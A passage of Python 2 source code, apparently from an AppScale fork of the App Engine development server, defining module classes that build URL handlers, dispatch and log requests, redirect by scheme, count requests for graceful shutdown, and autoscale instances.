url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
}
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
A instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
      A list of url_handler.URLHandlers that can handle requests as described
      in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
# Add a handler for Endpoints, only if version == 1.0
runtime_config = self._get_runtime_config()
for library in runtime_config.libraries:
if library.name == 'endpoints' and library.version == '1.0':
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_port = self._api_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._module_configuration.runtime == 'php':
if self._php_executable_path:
runtime_config.php_config.php_executable_path = (
self._php_executable_path)
runtime_config.php_config.enable_debugger = (
self._enable_php_remote_debugging)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
    If neither config_changed nor file_changed is True, this is a no-op.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
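  # Example of the policy's effect (counts assumed for illustration): with
  # policy == instance.AFTER_FIRST_REQUEST, an instance whose total_requests
  # is 0 survives a pure file change while one with total_requests > 0 is
  # quit; a config change quits every instance regardless of policy.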
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=has_file_changes)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
      api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
      automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._host = host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_executable_path = php_executable_path
self._enable_php_remote_debugging = enable_php_remote_debugging
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
# AppScale: Keeps track of active requests in case of shutdown.
# Indicates that the instance should refuse future requests.
self.sigterm_sent = False
# Handles request count and sigterm flag mutations.
self.graceful_shutdown_lock = threading.Lock()
# Keeps track of how many requests the instance is serving.
self.request_count = 0
# End AppScale.
@property
def name(self):
"""The name of the module, as defined in app.yaml.
    This value will be constant for the lifetime of the module even if the
    module configuration changes.
"""
return self._name
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status):
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
# AppScale: Check if the instance should be shutting down before handling
# request.
def _handle_request(self, environ, start_response, *args, **kwargs):
""" A _handle_request wrapper that keeps track of active requests.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
with self.graceful_shutdown_lock:
if self.sigterm_sent:
start_response('503 Service Unavailable',
[('Content-Type', 'text/plain')])
return ['This instance is shutting down']
self.request_count += 1
try:
return self._handle_request_impl(environ, start_response, *args,
**kwargs)
finally:
with self.graceful_shutdown_lock:
self.request_count -= 1
# End AppScale.
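  # Note: sigterm_sent is only read here; presumably an AppScale shutdown
  # path outside this module (an assumption -- it is not shown in this file)
  # sets the flag and then uses request_count to wait for in-flight requests
  # to drain before quitting the instance.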
def _handle_request_impl(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
    try:
      environ['SERVER_PORT'] = environ['HTTP_HOST'].split(':')[1]
    except (KeyError, IndexError):
      # HTTP_HOST may be absent or carry no explicit port; fall back to the
      # default port for the forwarded scheme. PEP-333 requires SERVER_PORT
      # to be a string, and comparisons below expect one (e.g. == '80').
      scheme = environ.get('HTTP_X_FORWARDED_PROTO', 'http')
      if scheme == 'http':
        environ['SERVER_PORT'] = '80'
      else:
        environ['SERVER_PORT'] = '443'
# AppScale: Modify environment based on proxy headers.
x_proto = environ.get('HTTP_X_FORWARDED_PROTO')
if x_proto:
environ['wsgi.url_scheme'] = x_proto
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], environ['SERVER_PORT'])
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.version_id,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
int(environ.get('CONTENT_LENGTH') or '0') != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
with self._handler_lock:
handlers = self._handlers
try:
request_url = environ['PATH_INFO']
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(request_url)
if match:
# AppScale: Reject requests with the wrong scheme.
redirect_response = self._handle_redirect(
handler, environ, wrapped_start_response)
if redirect_response is not None:
return redirect_response
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
      except StandardError as e:
logging.exception('Request to %r failed', request_url)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _handle_redirect(self, handler, environ, start_response):
""" AppScale: Reject requests with the wrong scheme. """
# Only reject requests that come through nginx.
if 'HTTP_X_FORWARDED_PROTO' not in environ:
return
# Ignore handlers that the user did not configure.
if not isinstance(handler, url_handler.UserConfiguredURLHandler):
return
scheme = environ['HTTP_X_FORWARDED_PROTO']
expected_scheme = scheme
if handler._url_map.secure == 'always':
expected_scheme = 'https'
elif handler._url_map.secure == 'never':
expected_scheme = 'http'
if scheme == expected_scheme:
return
redirect_port = environ['HTTP_X_REDIRECT_HTTP_PORT'] \
if expected_scheme == 'http' else environ['HTTP_X_REDIRECT_HTTPS_PORT']
redirect_host = '{}:{}'.format(environ['HTTP_HOST'].split(':')[0],
redirect_port)
new_location = ''.join([expected_scheme, '://', redirect_host,
environ.get('REQUEST_URI', '/')])
start_response('302 Moved Temporarily', [('Location', new_location)])
return []
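  # Worked example (header values assumed): a handler with secure: always
  # receiving HTTP_X_FORWARDED_PROTO == 'http', HTTP_HOST == 'app.example.com'
  # and HTTP_X_REDIRECT_HTTPS_PORT == '8443' is answered with
  #   302, Location: https://app.example.com:8443/<REQUEST_URI>
  # Requests that did not pass through nginx (no X-Forwarded-Proto header)
  # are never redirected.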
def _async_shutdown_instance(self, inst, port):
_THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
    except Exception:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
      variable length to emulate the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_executable_path,
self._enable_php_remote_debugging,
self._python_config,
self._cloud_sql_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
util.put_headers_in_environ(headers, environ)
if fake_login:
environ[constants.FAKE_IS_ADMIN_HEADER] = login.fake_admin()
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
elif constants.FAKE_LOGGED_IN_HEADER in environ:
del environ[constants.FAKE_LOGGED_IN_HEADER]
environ['HTTP_HOST'] = host
return environ
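# A minimal usage sketch for build_request_environ, mirroring how
# _start_instance and _shutdown_instance drive internal requests (the header
# list shown here is an assumption, not a value taken from this module):
#   environ = module.build_request_environ(
#       'GET', '/_ah/start', [('X-Example', '1')], '', '0.1.0.3', port,
#       fake_login=True)
#   module._handle_request(environ, start_response_utils.null_start_response,
#                          inst=inst, request_type=instance.READY_REQUEST)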
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
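  # For example, following the forms named in the docstring:
  #   _parse_pending_latency('0.1s')   -> 0.1
  #   _parse_pending_latency('1000ms') -> 1.0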
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
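  # E.g. an automatic_scaling block that only sets min_pending_latency keeps
  # that value and inherits max_pending_latency='0.5s', min_idle_instances=1
  # and max_idle_instances=1000 from _DEFAULT_AUTOMATIC_SCALING.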
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
      automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
    # A deque containing (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
    # The instance adjustment thread depends on the balanced module and the
    # watcher, so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
